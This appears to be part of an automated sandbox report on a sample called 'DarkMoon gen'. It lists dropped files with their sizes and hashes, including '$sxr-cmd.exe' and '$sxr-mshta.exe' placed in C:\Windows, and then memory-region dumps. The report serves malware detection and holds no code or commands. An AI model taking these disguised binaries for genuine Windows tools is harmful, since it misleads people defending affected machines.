                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERECB6.tmp.csv
                                                                                                                                                        Filesize

                                                                                                                                                        41KB

                                                                                                                                                        MD5

                                                                                                                                                        be8f94a4d74d345783c13da84e8f4b69

                                                                                                                                                        SHA1

                                                                                                                                                        f24582a0e117d08afc1d0376e07c9945332ddd62

                                                                                                                                                        SHA256

                                                                                                                                                        cffaf770e403de5ea927646c3a1bc72b8e728b97a73d383268794bd772c5befe

                                                                                                                                                        SHA512

                                                                                                                                                        db5ae78c21929636cd9ea240938741e348251bf44d22e1b15e73500ea1fe653f153afde3f46eeb9adf532cb36f9fbb02dfeec27c8c57d66ce4281e39c21fb695

                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERECD6.tmp.txt
                                                                                                                                                        Filesize

                                                                                                                                                        13KB

                                                                                                                                                        MD5

                                                                                                                                                        a49fcbf808fe0121f3fe5aa0a4b802a2

                                                                                                                                                        SHA1

                                                                                                                                                        ba70d6d065b2c5d844b0bfe8ee9a359f63e11189

                                                                                                                                                        SHA256

                                                                                                                                                        94d45198e72878aca2a061d5ec3cb33c89e5de1c204a577e87d86dd40c541f20

                                                                                                                                                        SHA512

                                                                                                                                                        bbf8e254094bd4a614f7f98800d7b49e85f1a88d430cdaa64500b77678dbd4f46578840a1b8eed327279526f32af746db648b49cbe45b569775ad4d37613b81f

                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE3E.tmp.csv
                                                                                                                                                        Filesize

                                                                                                                                                        41KB

                                                                                                                                                        MD5

                                                                                                                                                        425702875c1e194947c565cad4fef011

                                                                                                                                                        SHA1

                                                                                                                                                        5ad5b892c8fd63bf81d4777e948cb94f8642c8de

                                                                                                                                                        SHA256

                                                                                                                                                        b0e448d6c57b35518134e00204488317f651fd763b6afeef7b03fb1b25dd97e6

                                                                                                                                                        SHA512

                                                                                                                                                        5bf67659e9f4f51ae37215ebbb6f55d50f99e880e95204d60cd0e1248b5cf326f07b2bc75c5bc0fd79541fa16d068a79cfa31a7401dc6065f8339d3048575bed

                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE5E.tmp.txt
                                                                                                                                                        Filesize

                                                                                                                                                        13KB

                                                                                                                                                        MD5

                                                                                                                                                        4785e29ad93190a53e71793c5ba9e91c

                                                                                                                                                        SHA1

                                                                                                                                                        fd5ec43175765a7dcea2e493dd9e01068625f80f

                                                                                                                                                        SHA256

                                                                                                                                                        fde8d2f4e1b9b00a4e189a536f69566e01bbe8a26664fd8f4d204898bdda7b79

                                                                                                                                                        SHA512

                                                                                                                                                        afe7e9876a62b12de288ec7e4f1d3db023451d380cbb1663275793710df5edaa0c5367b502bbc6a06f39814e40622f1b42164793434aa9a521e1ba9b15a43a43

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe
                                                                                                                                                        Filesize

                                                                                                                                                        442KB

                                                                                                                                                        MD5

                                                                                                                                                        04029e121a0cfa5991749937dd22a1d9

                                                                                                                                                        SHA1

                                                                                                                                                        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                                        SHA256

                                                                                                                                                        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                                        SHA512

                                                                                                                                                        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.bat
                                                                                                                                                        Filesize

                                                                                                                                                        35KB

                                                                                                                                                        MD5

                                                                                                                                                        c153581143e0b72cecae38a393991a4b

                                                                                                                                                        SHA1

                                                                                                                                                        da43d03b19765594ff124415a060551343823a39

                                                                                                                                                        SHA256

                                                                                                                                                        2fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005

                                                                                                                                                        SHA512

                                                                                                                                                        8c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f

                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dx4lkurs.dox.ps1
                                                                                                                                                        Filesize

                                                                                                                                                        60B

                                                                                                                                                        MD5

                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                        SHA1

                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                        SHA256

                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                        SHA512

                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                      • C:\Windows\$sxr-cmd.exe
                                                                                                                                                        Filesize

                                                                                                                                                        283KB

                                                                                                                                                        MD5

                                                                                                                                                        8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                                                        SHA1

                                                                                                                                                        f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                                                        SHA256

                                                                                                                                                        b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                                                        SHA512

                                                                                                                                                        99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                                                                      • C:\Windows\$sxr-mshta.exe
                                                                                                                                                        Filesize

                                                                                                                                                        14KB

                                                                                                                                                        MD5

                                                                                                                                                        0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                                                        SHA1

                                                                                                                                                        51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                                                        SHA256

                                                                                                                                                        dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                                                        SHA512

                                                                                                                                                        d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                                                                      • memory/316-105-0x000001478B340000-0x000001478B367000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        156KB

                                                                                                                                                      • memory/316-106-0x00007FFD62630000-0x00007FFD62640000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        64KB

                                                                                                                                                      • memory/616-95-0x000001ECD06A0000-0x000001ECD06C7000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        156KB

                                                                                                                                                      • memory/616-101-0x00007FFD62630000-0x00007FFD62640000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        64KB

                                                                                                                                                      • memory/616-94-0x000001ECD0670000-0x000001ECD0692000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        136KB

                                                                                                                                                      • memory/672-103-0x00007FFD62630000-0x00007FFD62640000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        64KB

                                                                                                                                                      • memory/672-97-0x000001E6D8D40000-0x000001E6D8D67000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        156KB

                                                                                                                                                      • memory/744-112-0x00007FFD62630000-0x00007FFD62640000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        64KB

                                                                                                                                                      • memory/744-111-0x000001B5A8FD0000-0x000001B5A8FF7000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        156KB

                                                                                                                                                      • memory/960-108-0x0000020887F10000-0x0000020887F37000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        156KB

                                                                                                                                                      • memory/960-109-0x00007FFD62630000-0x00007FFD62640000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        64KB

                                                                                                                                                      • memory/1064-72-0x0000026D7D3E0000-0x0000026D7D5A2000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        1.8MB

                                                                                                                                                      • memory/1064-84-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        2.0MB

                                                                                                                                                      • memory/1064-61-0x0000026D78B70000-0x0000026D78B92000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        136KB

                                                                                                                                                      • memory/1064-62-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        2.0MB

                                                                                                                                                      • memory/1064-70-0x0000026D7CB60000-0x0000026D7CBB0000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        320KB

                                                                                                                                                      • memory/1064-71-0x0000026D7CC70000-0x0000026D7CD22000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        712KB

                                                                                                                                                      • memory/1064-59-0x0000026D7C0A0000-0x0000026D7C4DE000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        4.2MB

                                                                                                                                                      • memory/1064-82-0x0000026D7CBB0000-0x0000026D7CBEC000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        240KB

                                                                                                                                                      • memory/1064-83-0x0000026D7CB10000-0x0000026D7CB5E000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        312KB

                                                                                                                                                      • memory/1064-55-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        2.0MB

                                                                                                                                                      • memory/1064-85-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        760KB

                                                                                                                                                      • memory/1064-86-0x0000026D7CBF0000-0x0000026D7CC26000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        216KB

                                                                                                                                                      • memory/1064-57-0x0000026D7B150000-0x0000026D7B6D6000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        5.5MB

                                                                                                                                                      • memory/1064-58-0x0000026D7B8D0000-0x0000026D7C09A000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        7.8MB

                                                                                                                                                      • memory/1064-56-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        760KB

                                                                                                                                                      • memory/1064-60-0x0000026D7C4E0000-0x0000026D7C592000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        712KB

                                                                                                                                                      • memory/2888-30-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        16KB

                                                                                                                                                      • memory/2888-29-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        16KB

                                                                                                                                                      • memory/3236-114-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        128KB

                                                                                                                                                      • memory/3236-91-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        128KB

                                                                                                                                                      • memory/3924-23-0x0000025A66F30000-0x0000025A66F86000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        344KB

                                                                                                                                                      • memory/3924-20-0x0000025A66430000-0x0000025A66E80000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        10.3MB

                                                                                                                                                      • memory/3924-17-0x0000025A4BA40000-0x0000025A4BA64000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        144KB

                                                                                                                                                      • memory/3924-24-0x0000025A66F90000-0x0000025A66FE8000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        352KB

                                                                                                                                                      • memory/3924-19-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        760KB

                                                                                                                                                      • memory/3924-26-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        2.0MB

                                                                                                                                                      • memory/3924-28-0x0000025A4BA80000-0x0000025A4BA8A000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        40KB

                                                                                                                                                      • memory/3924-25-0x0000025A4BA60000-0x0000025A4BA82000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        136KB

                                                                                                                                                      • memory/3924-16-0x0000025A65EB0000-0x0000025A65ED2000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        136KB

                                                                                                                                                      • memory/3924-18-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        2.0MB

                                                                                                                                                      • memory/3924-22-0x0000025A66E80000-0x0000025A66F26000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        664KB

                                                                                                                                                      • memory/4344-32-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        24KB

                                                                                                                                                      • memory/4344-31-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        24KB

                                                                                                                                                      • memory/4976-89-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        2.0MB

                                                                                                                                                      • memory/4976-87-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        160KB

                                                                                                                                                      • memory/4976-88-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        160KB

                                                                                                                                                      • memory/4976-92-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        160KB

                                                                                                                                                      • memory/4976-90-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmp
                                                                                                                                                        Filesize

                                                                                                                                                        760KB